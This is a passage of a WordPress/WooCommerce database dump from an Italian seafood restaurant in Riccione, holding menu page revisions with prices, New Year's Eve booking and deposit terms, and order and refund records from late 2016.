vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica       postasolymar@libero.it.\nGrazie per la comprensione  \nTeo &  Barbara \n','Menu di San Silvestro 2017','','inherit','closed','closed','','225-autosave-v1','','','2016-11-26 19:27:18','2016-11-26 18:27:18','',225,'http://www.ristorantesolymar.it/2016/11/26/225-autosave-v1/',0,'revision','',0),(228,1,'2016-11-26 19:27:24','2016-11-26 18:27:24','<em>Spaghettino di spigola alla carbonara\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande</em>\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_category category=\"capodanno\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. \r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica       postasolymar@libero.it.\r\nGrazie per la comprensione  \r\nTeo &  Barbara \r\n','Menu di San Silvestro 2017','','inherit','closed','closed','','225-revision-v1','','','2016-11-26 19:27:24','2016-11-26 18:27:24','',225,'http://www.ristorantesolymar.it/2016/11/26/225-revision-v1/',0,'revision','',0),(229,1,'2016-11-29 09:51:17','2016-11-29 08:51:17','','Order &ndash; novembre 29, 2016 @ 09:51 AM','','wc-processing','open','closed','order_583d4103dea5b','ordine-nov-29-2016-0849-am','','','2016-11-29 09:51:17','2016-11-29 08:51:17','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=229',0,'shop_order','',3),(230,1,'2016-11-30 08:40:34','2016-11-30 07:40:34','','Order &ndash; novembre 30, 2016 @ 08:40 AM','','wc-refunded','open','closed','order_583e82076ef9d','ordine-nov-30-2016-0738-am','','','2017-01-01 10:42:19','2017-01-01 09:42:19','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=230',0,'shop_order','',4),(231,1,'2016-11-30 12:41:31','2016-11-30 11:41:31','','Order &ndash; novembre 30, 2016 @ 12:41 PM','','wc-cancelled','open','closed','order_583eab4825c35','ordine-nov-30-2016-1034-am','','','2016-11-30 12:41:31','2016-11-30 11:41:31','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=231',0,'shop_order','',1),(232,1,'2016-11-30 13:33:29','2016-11-30 12:33:29','','Order &ndash; novembre 30, 2016 @ 01:33 PM','','wc-processing','open','closed','order_583ec62e18b05','ordine-nov-30-2016-1229-pm','','','2016-11-30 13:33:29','2016-11-30 12:33:29','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=232',0,'shop_order','',3),(233,1,'2016-12-03 12:26:56','2016-12-03 11:26:56','','Order &ndash; dicembre 3, 2016 @ 12:26 PM','','wc-refunded','open','closed','order_5842ab85ee4b9','ordine-dec-03-2016-1124-am','','','2016-12-31 12:08:01','2016-12-31 11:08:01','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=233',0,'shop_order','',4),(235,1,'2016-12-04 03:50:30','2016-12-04 02:50:30','','Order &ndash; dicembre 4, 2016 @ 03:50 AM','','wc-cancelled','open','closed','order_5843677e4b123','ordine-dec-04-2016-1246-am','','','2016-12-04 03:50:30','2016-12-04 02:50:30','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=235',0,'shop_order','',1),(236,1,'2016-12-04 11:50:22','2016-12-04 10:50:22','','capodanno-solymar','','inherit','open','closed','','capodanno-solymar','','','2016-12-04 11:50:22','2016-12-04 10:50:22','',225,'http://www.ristorantesolymar.it/wp-content/uploads/2016/11/capodanno-solymar.jpg',0,'attachment','image/jpeg',0),(237,1,'2016-12-04 11:50:47','2016-12-04 10:50:47','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/11/capodanno-solymar-300x300.jpg\" alt=\"capodanno-solymar\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-236\" /><em>Spaghettino di spigola alla carbonara\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande</em>\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_category category=\"capodanno\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. \r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica       postasolymar@libero.it.\r\nGrazie per la comprensione  \r\nTeo &  Barbara \r\n','Menu di San Silvestro 2017','','inherit','closed','closed','','225-revision-v1','','','2016-12-04 11:50:47','2016-12-04 10:50:47','',225,'http://www.ristorantesolymar.it/2016/12/04/225-revision-v1/',0,'revision','',0),(238,1,'2016-12-04 11:51:18','2016-12-04 10:51:18','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/11/capodanno-solymar-300x300.jpg\" alt=\"capodanno-solymar\" width=\"250\" height=\"250\" class=\"alignright size-medium wp-image-236\" /><em>Spaghettino di spigola alla carbonara\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande</em>\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_category category=\"capodanno\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. \r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica       postasolymar@libero.it.\r\nGrazie per la comprensione  \r\nTeo &  Barbara \r\n','Menu di San Silvestro 2017','','inherit','closed','closed','','225-revision-v1','','','2016-12-04 11:51:18','2016-12-04 10:51:18','',225,'http://www.ristorantesolymar.it/2016/12/04/225-revision-v1/',0,'revision','',0),(239,1,'2016-12-04 18:29:49','2016-12-04 17:29:49','','Order &ndash; dicembre 4, 2016 @ 06:29 PM','','wc-processing','open','closed','order_5844517eeb50e','ordine-dec-04-2016-0525-pm','','','2016-12-04 18:29:49','2016-12-04 17:29:49','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=239',0,'shop_order','',3),(240,1,'2016-12-04 18:29:05','2016-12-04 17:29:05','','Order &ndash; dicembre 4, 2016 @ 06:29 PM','','wc-processing','open','closed','order_5844519966de5','ordine-dec-04-2016-0525-pm-2','','','2016-12-04 18:29:05','2016-12-04 17:29:05','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=240',0,'shop_order','',3),(241,1,'2016-12-06 18:16:19','2016-12-06 17:16:19','','Order &ndash; dicembre 6, 2016 @ 06:16 PM','','wc-processing','open','closed','order_5846f03766417','ordine-dec-06-2016-0507-pm','','','2016-12-06 18:16:19','2016-12-06 17:16:19','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=241',0,'shop_order','',3),(242,1,'2016-12-07 20:14:24','2016-12-07 19:14:24','','Order &ndash; dicembre 7, 2016 @ 08:14 PM','','wc-processing','open','closed','order_58485f33b43b2','ordine-dec-07-2016-0712-pm','','','2016-12-07 20:14:24','2016-12-07 19:14:24','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=242',0,'shop_order','',3),(243,1,'2016-12-07 22:16:43','2016-12-07 21:16:43','','Order &ndash; dicembre 7, 2016 @ 10:16 PM','','wc-processing','open','closed','order_58487bdfc3bc0','ordine-dec-07-2016-0915-pm','','','2016-12-07 22:16:43','2016-12-07 21:16:43','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=243',0,'shop_order','',4),(244,1,'2016-12-09 10:23:11','2016-12-09 09:23:11','Tavolo per <strong>5 persone</strong> - anticipo caparra confirmatoria','Prenotazione Tavolo per 5 Persone','Prenotazione tavolo per <strong>5 persone</strong>','draft','closed','closed','','prenotazione-tavolo-per-5-persone','','','2018-03-10 08:50:39','2018-03-10 07:50:39','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-5-persone/',1,'product','',0),(246,1,'2016-12-10 14:59:00','2016-12-10 13:59:00','','Order &ndash; dicembre 10, 2016 @ 02:59 PM','','wc-processing','open','closed','order_584c0909972d7','ordine-dec-10-2016-0154-pm','','','2016-12-10 14:59:00','2016-12-10 13:59:00','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=246',0,'shop_order','',3),(248,1,'2016-12-14 12:25:21','2016-12-14 11:25:21','','Order &ndash; dicembre 14, 2016 @ 12:25 PM','','wc-refunded','open','closed','order_585120b95abb1','ordine-dec-14-2016-1036-am','','','2016-12-31 12:03:57','2016-12-31 11:03:57','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=248',0,'shop_order','',4),(250,1,'2016-12-15 15:58:33','2016-12-15 14:58:33','','Order &ndash; dicembre 15, 2016 @ 03:58 PM','','wc-processing','open','closed','order_5852aece39f94','ordine-dec-15-2016-0255-pm','','','2016-12-15 15:58:33','2016-12-15 14:58:33','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=250',0,'shop_order','',3),(251,1,'2016-12-15 21:28:18','2016-12-15 20:28:18','','sold-out','','inherit','open','closed','','sold-out','','','2016-12-15 21:28:18','2016-12-15 20:28:18','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/12/sold-out.png',0,'attachment','image/png',0),(252,1,'2016-12-16 10:32:13','2016-12-16 09:32:13','','Order &ndash; dicembre 16, 2016 @ 10:32 AM','','wc-processing','open','closed','order_5853b45e3804c','ordine-dec-16-2016-0931-am','','','2016-12-16 10:32:13','2016-12-16 09:32:13','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=252',0,'shop_order','',3),(253,1,'2016-12-16 13:22:28','2016-12-16 12:22:28','','Order &ndash; dicembre 16, 2016 @ 01:22 PM','','wc-processing','open','closed','order_5853dc0537333','ordine-dec-16-2016-1220-pm','','','2016-12-16 13:22:28','2016-12-16 12:22:28','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=253',0,'shop_order','',3),(254,1,'2016-12-17 00:15:25','2016-12-16 23:15:25','','Order &ndash; dicembre 17, 2016 @ 12:15 AM','','wc-processing','open','closed','order_585473f50bdaf','ordine-dec-16-2016-1108-pm','','','2016-12-17 00:15:25','2016-12-16 23:15:25','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=254',0,'shop_order','',3),(255,1,'2016-12-17 21:13:16','2016-12-17 20:13:16','','Order &ndash; dicembre 17, 2016 @ 09:13 PM','','wc-processing','open','closed','order_58559ba89b704','ordine-dec-17-2016-0810-pm','','','2016-12-17 21:13:16','2016-12-17 20:13:16','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=255',0,'shop_order','',3),(256,1,'2016-12-20 14:17:20','2016-12-20 13:17:20','','Order &ndash; dicembre 20, 2016 @ 02:17 PM','','wc-cancelled','open','closed','order_58591be846f89','ordine-dec-20-2016-1154-am','','','2016-12-20 14:17:20','2016-12-20 13:17:20','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=256',0,'shop_order','',1),(257,1,'2016-12-21 12:52:37','2016-12-21 11:52:37','','Order &ndash; dicembre 21, 2016 @ 12:52 PM','','wc-processing','open','closed','order_585a6c35d3c9f','ordine-dec-21-2016-1149-am','','','2016-12-21 12:52:37','2016-12-21 11:52:37','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=257',0,'shop_order','',3),(258,1,'2016-12-21 21:50:56','2016-12-21 20:50:56','','Order &ndash; dicembre 21, 2016 @ 09:50 PM','','wc-cancelled','open','closed','order_585ad33119761','ordine-dec-21-2016-0708-pm','','','2016-12-21 21:50:56','2016-12-21 20:50:56','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=258',0,'shop_order','',1),(259,1,'2016-12-21 22:38:27','2016-12-21 21:38:27','','Order &ndash; dicembre 21, 2016 @ 10:38 PM','','wc-processing','open','closed','order_585af46427601','ordine-dec-21-2016-0930-pm','','','2016-12-21 22:38:27','2016-12-21 21:38:27','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=259',0,'shop_order','',3),(261,1,'2016-12-23 13:28:17','2016-12-23 12:28:17','','Order &ndash; dicembre 23, 2016 @ 01:28 PM','','wc-processing','open','closed','order_585d1818bf57a','ordine-dec-23-2016-1227-pm','','','2016-12-23 13:28:17','2016-12-23 12:28:17','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=261',0,'shop_order','',3),(264,1,'2016-12-27 14:42:49','2016-12-27 13:42:49','','Coupon Envelope Cut Out Dotted Line Special Offer Sale','Coupon word with dotted line around it in an envelope for you to cut out and save at a sale or discount clearance event of a store','inherit','open','closed','','coupon-envelope-cut-out-dotted-line-special-offer-sale','','','2016-12-27 14:42:49','2016-12-27 13:42:49','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/12/ptg-coupon-code-photo.jpg',0,'attachment','image/jpeg',0),(265,1,'2016-12-30 13:24:07','2016-12-30 12:24:07','','Order &ndash; dicembre 30, 2016 @ 01:24 PM','','wc-processing','open','closed','order_586649efe1384','ordine-dec-30-2016-1150-am','','','2016-12-30 13:24:07','2016-12-30 12:24:07','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=265',0,'shop_order','',3),(266,1,'2016-12-30 15:55:47','2016-12-30 14:55:47','','Order &ndash; dicembre 30, 2016 @ 03:55 PM','','wc-processing','open','closed','order_5866704e48193','ordine-dec-30-2016-0233-pm','','','2016-12-30 15:55:47','2016-12-30 14:55:47','',0,'http://www.ristorantesolymar.it/?post_type=shop_order&#038;p=266',0,'shop_order','',3),(267,1,'2016-12-31 12:03:57','2016-12-31 11:03:57','','Rimborso &ndash; Dec 31, 2016 @ 11:03 AM','Ordine Rimborsato Completamente','wc-completed','closed','closed','refund_5867909d5468a','rimborso-dec-31-2016-1103-am','','','2016-12-31 12:03:57','2016-12-31 11:03:57','',248,'http://www.ristorantesolymar.it/shop_order_refund/rimborso-dec-31-2016-1103-am/',0,'shop_order_refund','',0),(268,1,'2016-12-31 12:08:01','2016-12-31 11:08:01','','Rimborso &ndash; Dec 31, 2016 @ 11:08 AM','Ordine Rimborsato Completamente','wc-completed','closed','closed','refund_586791916461a','rimborso-dec-31-2016-1108-am','','','2016-12-31 12:08:01','2016-12-31 11:08:01','',233,'http://www.ristorantesolymar.it/shop_order_refund/rimborso-dec-31-2016-1108-am/',0,'shop_order_refund','',0),(269,1,'2017-01-01 10:42:20','2017-01-01 09:42:20','','Rimborso &ndash; Jan 01, 2017 @ 09:42 AM','Ordine Rimborsato Completamente','wc-completed','closed','closed','refund_5868cefc0b1e3','rimborso-jan-01-2017-0942-am','','','2017-01-01 10:42:20','2017-01-01 09:42:20','',230,'http://www.ristorantesolymar.it/shop_order_refund/rimborso-jan-01-2017-0942-am/',0,'shop_order_refund','',0),(271,2,'2020-07-21 20:25:37','2020-07-21 18:25:37','<em>La Pasta</em>\n\n<em>Passatelli asciutti, con Sogliole nostrane, fiori di zucca e tartufo nero </em>\n\n<em>€15,oo</em>\n\n<em> </em>\n\n<em>Linguine del \"Pastificio Mancini\" con crema di peperoni dolci, tonno affumicato e bottarga fatta da noi</em>\n\n<em>€ 14,oo</em>\n\n<em> </em>\n\n<em>Tortelli ripieni di patate e stracciatella di bufala con ragù di astice, pomodorini e basilico</em>\n\n<em>€ 16,oo</em>\n\n<em> </em>\n\n<em>Tagliatelle al ragù… Di Pesce</em>\n\n<em>€ 13,oo</em>\n\n&nbsp;\n\n<em> Gnocchi vongole, canocchie e stridoli</em>\n\n<em>€ 14,00</em>\n\n&nbsp;\n\n<em><strong>Per chi non mangia pesce</strong></em>\n\n<em> </em>\n\n<em>Gnocchi con pomodoro fresco e basilico</em>\n\n<em>€ 10,oo</em>\n\n<em> </em>\n\n<em>Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\n\n<em> </em>\n\n&nbsp;\n\n&nbsp;','La Pasta','','inherit','closed','closed','','51-autosave-v1','','','2020-07-21 20:25:37','2020-07-21 18:25:37','',51,'http://www.ristorantesolymar.it/2017/01/24/51-autosave-v1/',0,'revision','',0),(272,2,'2017-01-24 16:16:08','2017-01-24 15:16:08','<em> </em>\r\n\r\n<em>Spaghettini Pastificio “dei Campi “Gragnano Igp canocchie ,carciofi e pomodori passiti</em>\r\n\r\n<em>€ 13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Calamarata del pastificio dei Campi di Gragnano con filetti di triglia, guanciale e pomodoro fresco</em>\r\n\r\n<em>€ 13,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Passatelli asciutti con Mazzancolle nostrane,melanzane ,arancio ,pomodori passiti e menta </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine “Pastificio Mancini” con crema di peperoni dolci,Tonno affumicato e Bottarga fatti da noi</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Gnocchetti di patate con alici affumicate, olive taggiasche,pomodorini e spuma di squaquerone</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tortello di patate e stracciatella di bufala con ragu di astice ,pomodorini e basilico</em>\r\n\r\n<em>€ 16,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Risotto (Riso Carnaroli Acquerello )tradizionale alla marinara *min. 2 porz. – tempo cottura 30’</em>\r\n\r\n<em>€ 13,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Bis di primi piatti *esclusi risotto e tortelli all’astice *min. 2 porz</em>\r\n\r\n<em>€ 14,00 a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> Per i vegetariani e vegani </em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghettino del Pastificio dei Campi di Gragnano al pesto di basilico e tofu (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Strozzapreti con ragù di seitan (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine alla carbonara (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n&nbsp;','La Pasta','','inherit','closed','closed','','51-revision-v1','','','2017-01-24 16:16:08','2017-01-24 15:16:08','',51,'http://www.ristorantesolymar.it/2017/01/24/51-revision-v1/',0,'revision','',0),(273,2,'2017-01-24 16:19:16','2017-01-24 15:19:16','<em>Tartara di mazzancolle</em>\r\n\r\n<em>su crumble di nocciole e foie gras con confettura di tropea</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em>Tavolozza di crudità</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di tonno pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di orata con zenzero e mela verde</em>\r\n\r\n<em>€12,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di ricciola alla mediterranea </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di spigola affumicato a freddo da noi, sedano e arancio</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Scampi nostrani crudi</em>\r\n\r\n<em>€ 8,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place,il nostro pane fatto in casa ,piccola entrée di Benvenuto </em>\r\n\r\n<em>€ 3,00</em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo o praticamente crudo è stato sottoposto a </em>\r\n\r\n<em>trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>','Pesce Crudo','','inherit','closed','closed','','49-autosave-v1','','','2017-01-24 16:19:16','2017-01-24 15:19:16','',49,'http://www.ristorantesolymar.it/2017/01/24/49-autosave-v1/',0,'revision','',0),(274,2,'2017-01-24 16:19:45','2017-01-24 15:19:45','<em>Tartara di mazzancolle</em>\r\n\r\n<em>su crumble di nocciole e foie gras con confettura di tropea</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em>Tavolozza di crudità</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di tonno pistacchi, melanzane, pomodori arrostiti e squacquerone</em>\r\n\r\n<em>€12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tartara di orata con zenzero e mela verde</em>\r\n\r\n<em>€12,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di ricciola alla mediterranea </em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Carpaccio di spigola affumicato a freddo da noi, sedano e arancio</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Ostriche secondo la carta del giorno</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Scampi nostrani crudi</em>\r\n\r\n<em>€ 8,00 all’etto( min. 2 etti)</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spaghetto “SUSHI”</em>\r\n\r\n<em>(spaghetto artigianale condito a freddo con il nostro pesce crudo)</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Mise en place,il nostro pane fatto in casa ,piccola entrée di Benvenuto </em>\r\n\r\n<em>€ 3,00</em>\r\n\r\n<em>Il pesce destinato ad essere consumato crudo o praticamente crudo è stato sottoposto a </em>\r\n\r\n<em>trattamento di bonifica preventiva conforme alle prescrizioni del regolamento (CE)835/2004</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>','Pesce Crudo','','inherit','closed','closed','','49-revision-v1','','','2017-01-24 16:19:45','2017-01-24 15:19:45','',49,'http://www.ristorantesolymar.it/2017/01/24/49-revision-v1/',0,'revision','',0),(275,2,'2020-07-21 12:16:32','2020-07-21 10:16:32','<strong><em>Antipasti Crudi</em></strong>\n\n<em> </em><em>Tartara di Tonno rosso con crema di melanzane, pomodori arrostiti,  squacquerone e granella di pistacchi</em>\n\n<em>€ 15,0o </em>\n\n<em>Sashimi di Sgombro nostrano marinato, con \"Tzatziki\" di kefir, cetrioli, gel di limone cotto a bassa temperatura e menta</em>\n\n<em>€ 14,oo</em>\n\n<em> </em><em>Scampi nostrani crudi                                                    € 10,00 all\'etto (min. 2 etti)</em>\n\n<em>Tavolozza di crudi                                                            € 20,00</em>\n\n<em>Le ostriche del giorno (min.3)</em>\n\nDegustazione di ostriche (6 ostriche)                            <em>€ 22,00</em>\n\n&nbsp;\n\n<strong><em>Antipasti Freddi</em></strong>\n\nTagliatelle di Seppia, cotte a bassa temperatura,\"allo scoglio\" con frutti di mare e crostacei\n\n(servita a temperatura ambiente)\n\n<em>€ 14,00</em>\n\n&nbsp;\n\n<em><strong>Antipasti Caldi</strong></em>\n\n<em>Piadine fritte ripiene di Sardoncini grigliati, radicchio rosso , cipolla di tropea e squacquerone</em>\n\n<em>€ 13,oo</em>\n\n<em>Fiori di zucca al forno, ripieni di Gamberi e mozzarella di bufala</em>\n\n<em>€14,00</em>\n\n<em>I gamberi alla greca (dal 1994)</em>\n\n<em>con pomodoro fresco e formaggio fuso</em>\n\n<em>€ 15,oo</em>\n\n<em> </em>\n\n<em> </em>\n\n<em>  </em>\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n&nbsp;\n\n<em> </em>\n\n<em>In questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare, anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','inherit','closed','closed','','47-autosave-v1','','','2020-07-21 12:16:32','2020-07-21 10:16:32','',47,'http://www.ristorantesolymar.it/2017/01/24/47-autosave-v1/',0,'revision','',0),(276,2,'2017-01-24 16:24:15','2017-01-24 15:24:15','<em>Piccola degustazione di antipasti, un crudo e due cotti secondo mercato (min 2 porzioni)</em>\r\n\r\n<em>€ 19,oo cad.</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tagliatelle di Seppia cotta a bassa temperatura“allo scoglio”, con frutti di mare e crostacei(temperatura ambiente)</em>\r\n\r\n<em>€ 